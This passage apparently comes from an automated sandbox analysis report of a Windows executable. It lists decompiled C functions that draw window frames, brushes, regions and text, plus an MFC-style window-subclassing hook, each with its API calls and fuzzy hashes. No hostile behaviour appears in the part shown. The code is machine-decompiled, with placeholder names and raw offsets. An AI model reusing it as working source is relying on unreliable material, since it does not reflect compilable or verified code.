							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
							__eflags =  *(_t456 - 0x18);
							if( *(_t456 - 0x18) != 0) {
								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
							}
							 *(_t456 - 4) = 3;
							E00416AEC(_t456 - 0x10);
						}
						__eflags =  *(_t456 - 0x2e) & 0x00000008;
						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
							L23:
							 *(_t456 - 0x24) =  *(_t456 - 0x64);
							L25:
							 *(_t456 - 0x58) = 0x42cb14;
							 *(_t456 - 4) = 9;
							E0041A668(_t456 - 0x58);
							 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
							 *(_t456 - 4) = 0xa;
							E0041A668(_t456 - 0x60);
							 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
							 *(_t456 - 4) = 0xb;
						} else {
							E00419B00(_t456 - 0x80);
							 *(_t456 - 4) = 5;
							asm("sbb eax, eax");
							_t267 = E00419BB7(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
							__eflags = _t267;
							if(_t267 != 0) {
								_t268 =  *0x439ca4; // 0x0
								__eflags = _t268;
								if(_t268 == 0) {
									_t447 = 0;
									__eflags = 0;
								} else {
									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
								}
								_t392 =  *0x439c9c; // 0x0
								_t420 =  *0x439c98; // 0x0
								asm("sbb eax, eax");
								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
								__eflags = _t447;
								if(_t447 != 0) {
									SelectObject( *(_t456 - 0x7c), _t447);
								}
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								goto L23;
							} else {
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								 *(_t456 - 0x58) = 0x42cb14;
								 *(_t456 - 4) = 6;
								E0041A668(_t456 - 0x58);
								 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
								 *(_t456 - 4) = 7;
								E0041A668(_t456 - 0x60);
								 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
								 *(_t456 - 4) = 8;
							}
						}
					}
					E0041A668(_t456 - 0x4c);
					_t197 = _t456 - 4;
					 *_t197 =  *(_t456 - 4) | 0xffffffff;
					__eflags =  *_t197;
					_t239 = E0041A48F(_t456 - 0x44);
				} else {
					_t239 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
				return _t239;
			}

APIs

__EH_prolog.LIBCMT ref: 00423387
GetWindowRect.USER32 ref: 004233CB
OffsetRect.USER32(?,?,?), ref: 004233E1
GetSysColor.USER32(00000006), ref: 004233FE
CreateSolidBrush.GDI32(00000000), ref: 00423407
GetSysColor.USER32(?), ref: 0042342E
CreateSolidBrush.GDI32(00000000), ref: 00423431
GetSysColor.USER32(?), ref: 00423458
CreateSolidBrush.GDI32(00000000), ref: 0042345B
GetSystemMetrics.USER32 ref: 0042346E
GetSystemMetrics.USER32 ref: 00423475
GetSystemMetrics.USER32 ref: 0042347C
GetSystemMetrics.USER32 ref: 00423482
InflateRect.USER32(?,?,?), ref: 004234BA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction ID: 63fa9e6fd2119b7c539c7c0ae66551d555764ff581325622ef96e7efc3e9d792
Opcode Fuzzy Hash: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction Fuzzy Hash: 1A022871E00219ABCF11DFE4DD89EEEBBB9EF08704F14411AE505B7290DB78AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139FC, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004139FC(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				CHAR* _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E00425C92(0x4397cc, E0042440D);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E00424BFB() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x439c54 == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4);
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E00413980;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E00413821;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E00413785(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x439c3c != 0 || _v12 != 0) {
							L18:
							_t105 = E0041381B();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x439c50; // 0x4c3588
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E0041357F(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E0041381B();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					if(lstrcmpiA(_t76, ?str?) == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

CallNextHookEx.USER32 ref: 00413A26
GetClassLongA.USER32 ref: 00413A6D
GlobalGetAtomNameA.KERNEL32 ref: 00413A99
lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0002440D), ref: 00413AA8
GetWindowLongA.USER32 ref: 00413B1B
SetWindowLongA.USER32 ref: 00413B3C

Strings

ime, xrefs: 00413AA2
AfxOldWndProc423, xrefs: 00413B7D, 00413B82, 00413B8D, 00413B95, 00413B9E

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction ID: e36065fefe0489718c47fffdee2bb39183bb531f2b2dfd07b326dd1187a37919
Opcode Fuzzy Hash: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction Fuzzy Hash: C951C531604215ABCF21AF25DC48B9F7BA8FF04762F104525F916A7292D738EE81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00423C5A, Relevance: 28.8, APIs: 19, Instructions: 266
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423C5A(intOrPtr* __ecx, void* __eflags) {
				void* _t146;
				void* _t150;
				void* _t159;
				void* _t165;
				intOrPtr* _t246;
				RECT* _t250;
				void* _t255;

				E00406520(E0042AAB8, _t255);
				_t246 = __ecx;
				E00405556(_t255 - 0x2c);
				 *(_t255 - 0x2c) = 0x42f0f0;
				 *((intOrPtr*)(_t255 - 4)) = 0;
				E00405556(_t255 - 0x1c);
				 *(_t255 - 0x1c) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 1;
				E00405556(_t255 - 0x14);
				 *(_t255 - 0x14) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 2;
				E0041A611(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
				CopyRect(_t255 - 0x44,  *(_t255 + 8));
				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
				E0041A611(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
				E0041A611(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
				_t261 =  *((intOrPtr*)(_t255 + 0x20));
				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
					 *((intOrPtr*)(_t255 + 0x20)) = E00423BE7(_t261);
				}
				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
				}
				E00405556(_t255 - 0x24);
				 *(_t255 - 0x24) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 3;
				E00405556(_t255 - 0x34);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42f0f0;
				_t250 =  *(_t255 + 0x14);
				 *((char*)(_t255 - 4)) = 4;
				if(_t250 != 0) {
					E0041A611(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
					CopyRect(_t255 - 0x44, _t250);
					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
					asm("sbb eax, eax");
					asm("sbb ecx, ecx");
					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
						E0041A611(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
						asm("sbb eax, eax");
						asm("sbb ecx, ecx");
						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
					E0041A0FB(_t246, _t255 - 0x24);
					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
					_t165 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x24)));
					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
					E00419D35(_t246, _t165);
				}
				_t146 = _t255 - 0x34;
				if( *(_t255 - 0x30) == 0) {
					_t146 = _t255 - 0x2c;
				}
				E0041A0FB(_t246, _t146);
				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
				_t150 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x20)));
				_t251 = _t150;
				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
				if(_t150 != 0) {
					E00419D35(_t246, _t251);
				}
				E0041A0FB(_t246, 0);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 5;
				E0041A668(_t255 - 0x34);
				 *(_t255 - 0x24) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 6;
				E0041A668(_t255 - 0x24);
				 *(_t255 - 0x14) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 7;
				E0041A668(_t255 - 0x14);
				 *(_t255 - 0x1c) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 8;
				E0041A668(_t255 - 0x1c);
				 *(_t255 - 0x2c) = 0x42cb14;
				 *((intOrPtr*)(_t255 - 4)) = 9;
				_t159 = E0041A668(_t255 - 0x2c);
				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
				return _t159;
			}

APIs

__EH_prolog.LIBCMT ref: 00423C5F
CreateRectRgnIndirect.GDI32(?), ref: 00423CA2
CopyRect.USER32 ref: 00423CB8
InflateRect.USER32(?,?,?), ref: 00423CCE
IntersectRect.USER32 ref: 00423CDF
CreateRectRgnIndirect.GDI32(?), ref: 00423CE9
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423CFC
CombineRgn.GDI32(?,?,?,00000003), ref: 00423D26
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423D71
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423D8E
CopyRect.USER32 ref: 00423D99
InflateRect.USER32(?,?,?), ref: 00423DAF
IntersectRect.USER32 ref: 00423DBE
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423DD3
CombineRgn.GDI32(?,?,?,00000003), ref: 00423DF4
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423E0C
CombineRgn.GDI32(?,?,?,00000003), ref: 00423E36

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,00000000), ref: 0041A11D
Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,?), ref: 0041A133

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423E8C
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423EE0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction ID: ab3a66f40d2d04ee3edfb297914df431d927688ea4f6a4c6808893f8cc49b6d9
Opcode Fuzzy Hash: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction Fuzzy Hash: A4A146B2A00119EFCF05EFA4DD95DEEBBB9EF08304F14411AF506A2250DB38AE55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00428C35, Relevance: 25.6, APIs: 17, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00428C35(intOrPtr* __ecx) {
				void* _t19;
				void* _t46;
				void* _t64;

				if( *(__ecx + 4) != 0) {
					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
					SelectObject( *(__ecx + 8), _t64);
					SelectObject( *(__ecx + 4), _t64);
					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t46);
					SelectObject( *(__ecx + 4), _t46);
					E00419E06(__ecx, GetROP2( *(__ecx + 8)));
					E00419DAA(__ecx, GetBkMode( *(__ecx + 8)));
					E0041A240(__ecx, GetTextAlign( *(__ecx + 8)));
					E00419DD8(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E00419E34(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
					return  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}

0x00428c3c
0x00428c5b
0x00428c61
0x00428c67
0x00428c73
0x00428c79
0x00428c7f
0x00428c8d
0x00428c9e
0x00428caf
0x00428cc0
0x00428cd1
0x00428ced
0x00428cf0
0x00428d04
0x00000000
0x00428d0c
0x00428d0e

APIs

GetStockObject.GDI32(00000007), ref: 00428C4D
SelectObject.GDI32(00000000,00000000), ref: 00428C59
SelectObject.GDI32(00000000,00000000), ref: 00428C61
SelectObject.GDI32(00000000,00000000), ref: 00428C67
GetStockObject.GDI32(00000004), ref: 00428C6B
SelectObject.GDI32(00000000,00000000), ref: 00428C71
SelectObject.GDI32(00000000,00000000), ref: 00428C79
SelectObject.GDI32(00000000,00000000), ref: 00428C7F
GetROP2.GDI32(00000000), ref: 00428C84

Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E1F
Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E2D

GetBkMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428C95

Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DC3
Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DD1

GetTextAlign.GDI32(00000000), ref: 00428CA6

Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A25B
Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A269

GetPolyFillMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CB7

Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DF1
Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DFF

GetStretchBltMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CC8

Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E4D
Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E5B

GetTextColor.GDI32(00000000), ref: 00428CD9
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428CE9
GetBkColor.GDI32(00000000), ref: 00428CF6
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428D00

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
String ID:
API String ID: 1751264856-0
Opcode ID: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction ID: b09d1b0ebf0f207bae19d4c81b9403c04553573e303ad89ba419e4ec13758243
Opcode Fuzzy Hash: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction Fuzzy Hash: 76214171200915AFC7227B66DC19D2FBBAEFF887407014429F55A82570CB35ACA29F98

Uniqueness

Uniqueness Score: -1.00%

Function 00427432, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00427432(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* _t171;
				struct HDC__* _t188;
				intOrPtr* _t192;
				intOrPtr _t203;
				struct HBRUSH__* _t239;
				intOrPtr* _t244;
				signed int* _t276;
				intOrPtr* _t281;
				intOrPtr _t301;
				intOrPtr _t317;
				intOrPtr* _t339;
				intOrPtr _t342;
				intOrPtr _t343;
				int* _t351;
				intOrPtr* _t352;
				int _t353;
				void* _t355;

				_t171 = E00406520(E0042A17C, _t355);
				_t281 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
					return _t171;
				} else {
					_t339 =  *((intOrPtr*)(_t355 + 8));
					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
					 *((intOrPtr*)(_t355 - 0x38)) = 0;
					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
					 *(_t355 - 0x28) =  *(_t355 - 0x20);
					 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb24;
					 *(_t355 - 4) = 0;
					E0041A611(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb24;
					 *(_t355 - 4) = 1;
					E0041A611(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
					 *((intOrPtr*)(_t355 - 0x10)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
						L21:
						E0041A668(_t355 - 0x3c);
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb14;
						 *(_t355 - 4) = 2;
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb14;
						 *(_t355 - 4) = 3;
						_t171 = E0041A668(_t355 - 0x3c);
						goto L22;
					} else {
						 *((intOrPtr*)(_t355 - 0x14)) = 0;
						while(1) {
							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
							if(_t339 != 0) {
								_t188 =  *(_t339 + 4);
							} else {
								_t188 = 0;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
							_t192 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
							}
							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
							 *((intOrPtr*)( *_t339 + 0x1c))();
							_t203 =  *((intOrPtr*)(_t281 + 0x90));
							_t301 =  *((intOrPtr*)(_t355 - 0x14));
							_t351 = _t301 + _t203;
							 *(_t355 - 0x1c) = _t351;
							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
									_t276 = E0041AFCE(_t281, _t355 - 0x44);
									 *(_t355 - 0x2c) =  ~( *_t276);
									 *(_t355 - 0x28) =  ~(_t276[1]);
								}
							}
							 *((intOrPtr*)( *_t339 + 0x34))(1);
							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
							E00419FFB(_t339, _t355 - 0x54, 0, 0);
							 *((intOrPtr*)( *_t339 + 0x24))(5);
							E00419D35(_t339, _t355 - 0x3c);
							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
							E00419D35(_t339, _t355 - 0x34);
							E0041A1BF(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							E0041A1BF(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
							_t239 = GetStockObject(0);
							_t352 =  *((intOrPtr*)(_t355 + 8));
							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
							_t244 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
								break;
							}
							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
							_t342 =  *((intOrPtr*)(_t355 - 0x10));
							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								L18:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
